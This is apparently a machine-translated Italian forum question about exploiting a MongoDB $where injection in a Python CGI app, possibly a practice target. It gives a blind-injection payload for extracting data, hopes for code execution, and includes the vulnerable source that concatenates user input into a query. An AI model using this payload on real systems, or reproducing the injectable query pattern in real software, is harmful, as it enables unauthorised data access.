Sto cercando di sfuggire alla query stringa in un'app Web basata su pymongo e mongodb. Sono in grado di ottenere i nomi delle collezioni, ma non riesco a visualizzarne il contenuto, dato che sto inserendo in dove clausola. Forse posso provare cieco?
di seguito:
dbparse.py?Parm1='||(tojsononeline(db.system.find()[0])[0]=='u')|'
Ma la mia domanda è, c'è un modo per sfuggire alla stringa per iniettare il codice e provare a RCE?
L'errore quando le virgolette vengono inviate come input Parm1
/usr/lib/cgi-bin/mongo/2.2.3/dbparse.py in ()
41 print "</th>"
42 if where:
=> 43 for record in collection.find(where):
44 print "<tr>"
45 print "<td align=\"center\">"+record["Param1"]+"</td>"
record undefined, collection = Collection(Database(MongoClient('localhost', 27017), u'test_db'), u'test_colle'), collection.find = <bound method Collection.find of Collection(Data...', 27017), u'test_db'), u'test_colle')>, where = {'$where': "this.Parm1 == ''''}
<class 'pymongo.errors.OperationFailure'>: database error: $where compile error
args = (u'database error: $where compile error',)
code = None
message = u'database error: $where compile error'
Codice sorgente del programma:
#!/usr/bin/python
# Import modules for CGI handling
import cgi, cgitb
cgitb.enable()
from pymongo import MongoClient
# Create instance of FieldStorage
form = cgi.FieldStorage()
# Connect to db
client = MongoClient()
db = client.test_db
collection = db.test_colle
# Get data from fields
condition = form.getvalue('Param1')
if condition:
where = {"$where": "this.Param1 == '"+condition+"'" }
else:
where = ""
print "Content-type:text/html\r\n\r\n"
print "<html>"
print "<head>"
print "<title>Hello - Second CGI Program</title>"
print "</head>"
print "<body>"
print "<h2>DDB Company name</h2>"
#print "<div name=\"debug\" value=\""+where+"\"/>"
form = """<form action="/mongo/2.2.3/dbparse.py" method="post">
CompanyName: <input type="text" name="Param1"><br />
<input type="submit" value="Submit" />
</form>"""
print form
print "<table>"
print "<tr>"
print "<th>Param1</th>"
print "<th>GarageName</th>"
print "<th>CompanyAddress</th>"
print "<th>GarageAddress</th>"
print "</th>"
if where:
for record in collection.find(where):
print "<tr>"
print "<td align=\"center\">"+record["Param1"]+"</td>"
print "<td align=\"center\">"+record["GarageName"]+"</td>"
print "<td align=\"center\">"+record["CompanyAddress"]+"</td>"
print "<td align=\"center\">"+record["GarageAddress"]+"</td>"
print "</tr>"
else:
for record in collection.find():
print "<tr>"
print "<td align=\"center\">"+record["Param1"]+"</td>"
print "<td align=\"center\">"+record["GarageName"]+"</td>"
print "<td align=\"center\">"+record["CompanyAddress"]+"</td>"
print "<td align=\"center\">"+record["GarageAddress"]+"</td>"
print "</tr>"
print "</table>"
print "</body>"
print "</html>"
#c = db.my_collection.find({"$where": condition})
#try:
# print c.next()
#except Exception,e:
# print str(e)